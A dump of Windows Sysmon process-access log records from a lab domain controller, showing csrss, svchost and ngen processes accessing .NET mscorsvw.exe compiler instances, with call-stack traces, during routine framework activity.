10341000x80000000000000006174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.452{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9134-6005-FF01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:28.437{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9134-6005-FF01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:28.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9134-6005-FE01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.015{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9134-6005-FE01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:28.015{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9134-6005-FE01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.796{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0B02-00000000A301}5020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.781{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0B02-00000000A301}5020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.781{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0B02-00000000A301}5020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.718{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0A02-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.703{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0A02-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.703{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0A02-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.546{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0902-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.531{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0902-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0902-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.484{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0802-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.468{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0802-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.468{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0802-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0702-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.390{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0702-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.390{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0702-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.328{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0602-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.328{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0602-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.328{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0602-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
